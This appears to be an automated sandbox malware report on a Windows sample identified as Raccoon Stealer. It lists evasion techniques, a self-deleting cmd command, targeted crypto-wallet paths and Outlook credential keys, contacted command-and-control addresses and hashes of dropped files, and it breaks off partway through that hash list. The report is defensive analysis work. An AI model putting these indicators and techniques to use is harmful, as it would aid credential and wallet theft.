                    Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr

                    Data Obfuscation:

                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Unpacked PE file: 0.2.31cGYywxgy.exe.400000.0.unpack
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Unpacked PE file: 0.2.31cGYywxgy.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_004000BB push edx; retf 0_2_004000C2
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_004407F0 push ecx; ret 0_2_00440803
                    Source: AccessibleHandler.dll.0.dr Static PE information: section name: .orpc
                    Source: AccessibleMarshal.dll.0.dr Static PE information: section name: .orpc
                    Source: IA2Marshal.dll.0.dr Static PE information: section name: .orpc
                    Source: lgpllibs.dll.0.dr Static PE information: section name: .rodata
                    Source: MapiProxy.dll.0.dr Static PE information: section name: .orpc
                    Source: MapiProxy_InUse.dll.0.dr Static PE information: section name: .orpc
                    Source: mozglue.dll.0.dr Static PE information: section name: .didat
                    Source: msvcp140.dll.0.dr Static PE information: section name: .didat
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0042A2F9 GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,0_2_0042A2F9
                    Source: ucrtbase.dll.0.dr Static PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]
                    Source: initial sample Static PE information: section name: .text entropy: 7.97515614602
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll

                    Hooking and other Techniques for Hiding and Protection:

                    Self deletion via cmd delete
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\31cGYywxgy.exe'
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_004206DD __EH_prolog,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004206DD
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe TID: 2212 Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\SysWOW64\timeout.exe TID: 6612 Thread sleep count: 93 > 30
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_00437819 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,0_2_00437819
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0043EFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,0_2_0043EFDD
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWen-USn
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0045C559 IsDebuggerPresent,OutputDebugStringW,0_2_0045C559
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_00433882 __EH_prolog,DeleteFileA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetFileSize,GetProcessHeap,HeapAlloc,lstrlenA,lstrlenA,lstrcpynA,lstrcpynA,lstrlenA,lstrcpynA,ReadFile,lstrlenA,lstrcpynA,WinHttpSetOption,WinHttpSetOption,WinHttpSetOption,WinHttpConnect,WinHttpConnect,WinHttpOpenRequest,WinHttpOpenRequest,WinHttpSendRequest,WinHttpReceiveResponse,WinHttpQueryDataAvailable,WinHttpReadData,WinHttpCloseHandle,WinHttpCloseHandle,CloseHandle,DeleteFileA,WinHttpCloseHandle,GetProcessHeap,HeapFree,0_2_00433882
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0045A03D mov eax, dword ptr fs:[00000030h] 0_2_0045A03D
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0045A081 mov eax, dword ptr fs:[00000030h] 0_2_0045A081
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0045A0B2 mov eax, dword ptr fs:[00000030h] 0_2_0045A0B2
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_00446625 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00446625
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize,0_2_0042C383
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,0_2_00437819
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00462391
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: EnumSystemLocalesW,0_2_00458577
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: GetLocaleInfoW,0_2_0046258C
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: EnumSystemLocalesW,0_2_0046267E
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: EnumSystemLocalesW,0_2_00462633
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: EnumSystemLocalesW,0_2_00462719
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_004627A4
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: GetLocaleInfoW,0_2_004629F7
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_00440985 cpuid 0_2_00440985
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0043E03E GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_0043E03E
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_004371FA __EH_prolog,GetUserNameA,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor,0_2_004371FA
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0042C383 __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize,0_2_0042C383

                    Stealing of Sensitive Information:

                    Yara detected Raccoon Stealer
                    Source: Yara match File source: 0.2.31cGYywxgy.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.3.31cGYywxgy.exe.2220000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.31cGYywxgy.exe.2120e50.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.3.31cGYywxgy.exe.2220000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.31cGYywxgy.exe.2120e50.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.31cGYywxgy.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000003.257211865.0000000002220000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.282454454.0000000002120000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: 31cGYywxgy.exe PID: 3104, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: Electrum-LTC;26;Electrum-LTC\wallets;*;|
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: ElectronCash;26;ElectronCash\wallets;*;|
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: Jaxx;26;Jaxx;*;*cache*
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: ;26;exodus
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum
                    Tries to steal Mail credentials (via file access)
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
                    Source: C:\Users\user\Desktop\31cGYywxgy.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

                    Remote Access Functionality:

                    Yara detected Raccoon Stealer
                    Source: Yara match File source: 0.2.31cGYywxgy.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.3.31cGYywxgy.exe.2220000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.31cGYywxgy.exe.2120e50.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.3.31cGYywxgy.exe.2220000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.31cGYywxgy.exe.2120e50.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.31cGYywxgy.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000003.257211865.0000000002220000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.282454454.0000000002120000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: 31cGYywxgy.exe PID: 3104, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                    Valid Accounts | Native API 1 | DLL Side-Loading 1 | DLL Side-Loading 1 | Deobfuscate/Decode Files or Information 1 | OS Credential Dumping | System Time Discovery 2 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                    Default Accounts | Scheduled Task/Job | Application Shimming 1 | Application Shimming 1 | Obfuscated Files or Information 3 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Data from Local System 1 | Exfiltration Over Bluetooth | Encrypted Channel 21 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                    Domain Accounts | At (Linux) | Logon Script (Windows) | Process Injection 11 | Software Packing 22 | Security Account Manager | File and Directory Discovery 1 | SMB/Windows Admin Shares | Screen Capture 1 | Automated Exfiltration | Non-Application Layer Protocol 4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Timestomp 1 | NTDS | System Information Discovery 36 | Distributed Component Object Model | Email Collection 1 | Scheduled Transfer | Application Layer Protocol 15 | SIM Card Swap | | Carrier Billing Fraud
                    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading 1 | LSA Secrets | Security Software Discovery 21 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                    Replication Through Removable Media | Launchd | Rc.common | Rc.common | File Deletion 1 | Cached Domain Credentials | Virtualization/Sandbox Evasion 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                    External Remote Services | Scheduled Task | Startup Items | Startup Items | Masquerading 1 | DCSync | Process Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                    Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 1 | Proc Filesystem | System Owner/User Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                    Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 11 | /etc/passwd and /etc/shadow | Remote System Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction


                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    Source | Detection | Scanner | Label | Link
                    31cGYywxgy.exe | 40% | ReversingLabs | Win32.Trojan.Sabsik |
                    31cGYywxgy.exe | 100% | Joe Sandbox ML | |

                    Dropped Files

                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll | 0% | Metadefender | | Browse
                    C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll | 0% | ReversingLabs | |
                    C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll | 0% | Metadefender | | Browse
                    C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll | 0% | ReversingLabs | |

                    Unpacked PE Files

                    Source | Detection | Scanner | Label | Link | Download
                    0.2.31cGYywxgy.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1139893 | | Download File
                    0.1.31cGYywxgy.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File

                    Domains

                    No Antivirus matches

                    URLs


                    Domains and IPs

                    Contacted Domains

                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    t.me | 149.154.167.99 | true | false | | high

                      Contacted URLs

                      Name | Malicious | Antivirus Detection | Reputation
                      http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d16 | true | Avira URL Cloud: safe | unknown
                      http://194.180.174.100/ | true | Avira URL Cloud: safe | unknown
                      https://t.me/agrybirdsgamerept | false | | high
                      http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/d9a87544924531ef155dbccfe1a04e27038ca861 | true | Avira URL Cloud: safe | unknown

                        URLs from Memory and Binaries


                                                          Contacted IPs


                                                          Public

                                                          IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                          194.180.174.100 | unknown | unknown | | 39798 | MIVOCLOUDMD | true
                                                          149.154.167.99 | t.me | United Kingdom | | 62041 | TELEGRAMRU | false

                                                          General Information

                                                          Joe Sandbox Version:33.0.0 White Diamond
                                                          Analysis ID:491712
                                                          Start date:27.09.2021
                                                          Start time:20:30:33
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 9m 7s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Sample file name:31cGYywxgy (renamed file extension from none to exe)
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:24
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@6/62@1/2
                                                          EGA Information:Failed
                                                          HDC Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 79
                                                          • Number of non-executed functions: 54
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          Warnings:
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 2.20.86.117, 95.100.54.203, 20.82.210.154, 40.112.88.60, 23.10.249.43, 23.10.249.26
                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                                          • Not all processes were analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/491712/sample/31cGYywxgy.exe

                                                          Simulations

                                                          Behavior and APIs

                                                          Time | Type | Description
                                                          20:31:39 | API Interceptor | 4x Sleep call for process: 31cGYywxgy.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                          Domains

                                                          Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                          ASN

                                                          Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                          JA3 Fingerprints

                                                          Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                          Dropped Files

                                                          Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                                                  Created / dropped Files

                                                                                                  C:\Users\user\AppData\LocalLow\UzHzOcbkHjz.zip
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:Zip archive data, at least v2.0 to extract
                                                                                                  Category:dropped
                                                                                                  Size (bytes):798
                                                                                                  Entropy (8bit):7.486252210525808
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:9F/Fnetx8MUPHUGDZf6nbSMOqUmYJ7x7ko:9NVa8RDynbmqUlYo
                                                                                                  MD5:B620879514592B8797EB9744C853362F
                                                                                                  SHA1:1F2A5B54EE2E4FE83DC797D831D1F7017B6B275C
                                                                                                  SHA-256:2A15FE41DEB1429DBCE26453D20AEE75C151DA8428634CB029455D27A4E35931
                                                                                                  SHA-512:5ED38628990811DF8D056F00FF0EA9BF169FDF0743BF2C72DAE831A6ABE659BAEA6408675548B62F0D4021180E085266E63F4CB587009A11007C8BE2B0F8E5E0
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):123344
                                                                                                  Entropy (8bit):6.504957642040826
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:DkO/6RZFrpiS7ewflNGa35iOrjmwWTYP1KxBxZJByEJMBrsuLeLsWxcdaocACs0K:biRZFdBiussQ1MBjq2aocts03/7FE
                                                                                                  MD5:F92586E9CC1F12223B7EEB1A8CD4323C
                                                                                                  SHA1:F5EB4AB2508F27613F4D85D798FA793BB0BD04B0
                                                                                                  SHA-256:A1A2BB03A7CFCEA8944845A8FC12974482F44B44FD20BE73298FFD630F65D8D0
                                                                                                  SHA-512:5C047AB885A8ACCB604E58C1806C82474DC43E1F997B267F90C68A078CB63EE78A93D1496E6DD4F5A72FDF246F40EF19CE5CA0D0296BBCFCFA964E4921E68A2F
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Metadefender, Detection: 0%
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Reputation:high, very likely benign file
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):26064
                                                                                                  Entropy (8bit):5.981632010321345
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:KuAjyb0Xc6JzVuLoW2XDOc3TXg1hjsvDG8A3OPLon07zS:BEygs6RV6oW2Xd38njiDG8Mj
                                                                                                  MD5:A7FABF3DCE008915CEE4FFC338FA1CE6
                                                                                                  SHA1:F411FB41181C79FBA0516D5674D07444E98E7C92
                                                                                                  SHA-256:D368EB240106F87188C4F2AE30DB793A2D250D9344F0E0267D4F6A58E68152AD
                                                                                                  SHA-512:3D2935D02D1A2756AAD7060C47DC7CABBA820CC9977957605CE9BBB44222289CBC451AD331F408317CF01A1A4D3CF8D9CFC666C4E6B4DB9DDD404C7629CEAA70
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Metadefender, Detection: 0%
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Reputation:high, very likely benign file
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):70608
                                                                                                  Entropy (8bit):5.389701090881864
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:3n8PHF564hn4wva3AVqH5PmE0SjA6QM0avrDG8MR43:38th4wvaQVE5PRl0xs
                                                                                                  MD5:5243F66EF4595D9D8902069EED8777E2
                                                                                                  SHA1:1FB7F82CD5F1376C5378CD88F853727AB1CC439E
                                                                                                  SHA-256:621F38BD19F62C9CE6826D492ECDF710C00BBDCF1FB4E4815883F29F1431DFDA
                                                                                                  SHA-512:A6AB96D73E326C7EEF75560907571AE9CAA70BA9614EB56284B863503AF53C78B991B809C0C8BAE3BCE99142018F59D42DD4BCD41376D0A30D9932BCFCAEE57A
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19920
                                                                                                  Entropy (8bit):6.2121285323374185
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:Y0GKgKt7QXmFJNauBT5+BjdvDG8A3OPLon6nt:aKgWc2FnnTOVDG8MSt
                                                                                                  MD5:7CD244C3FC13C90487127B8D82F0B264
                                                                                                  SHA1:09E1AD17F1BB3D20BD8C1F62A10569F19E838834
                                                                                                  SHA-256:BCFB0E397DF40ABA8C8C5DD23C13C414345DECDD3D4B2DF946226BE97DEFBF30
                                                                                                  SHA-512:C6319BB3D6CB4CABF96BD1EADB8C46A3901498AC0EB789D73867710B0D855AB28603A00647A9CF4D2F223D35ADB2CB71AB22C284EF18823BFF88D87CF31FD13D
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19920
                                                                                                  Entropy (8bit):6.2121285323374185
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:Y0GKgKt7QXmFJNauBT5+BjdvDG8A3OPLon6nt:aKgWc2FnnTOVDG8MSt
                                                                                                  MD5:7CD244C3FC13C90487127B8D82F0B264
                                                                                                  SHA1:09E1AD17F1BB3D20BD8C1F62A10569F19E838834
                                                                                                  SHA-256:BCFB0E397DF40ABA8C8C5DD23C13C414345DECDD3D4B2DF946226BE97DEFBF30
                                                                                                  SHA-512:C6319BB3D6CB4CABF96BD1EADB8C46A3901498AC0EB789D73867710B0D855AB28603A00647A9CF4D2F223D35ADB2CB71AB22C284EF18823BFF88D87CF31FD13D
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18232
                                                                                                  Entropy (8bit):7.112057846012794
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
                                                                                                  MD5:E2F648AE40D234A3892E1455B4DBBE05
                                                                                                  SHA1:D9D750E828B629CFB7B402A3442947545D8D781B
                                                                                                  SHA-256:C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
                                                                                                  SHA-512:18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
                                                                                                  Malicious:false
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18232
                                                                                                  Entropy (8bit):7.166618249693435
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
                                                                                                  MD5:E479444BDD4AE4577FD32314A68F5D28
                                                                                                  SHA1:77EDF9509A252E886D4DA388BF9C9294D95498EB
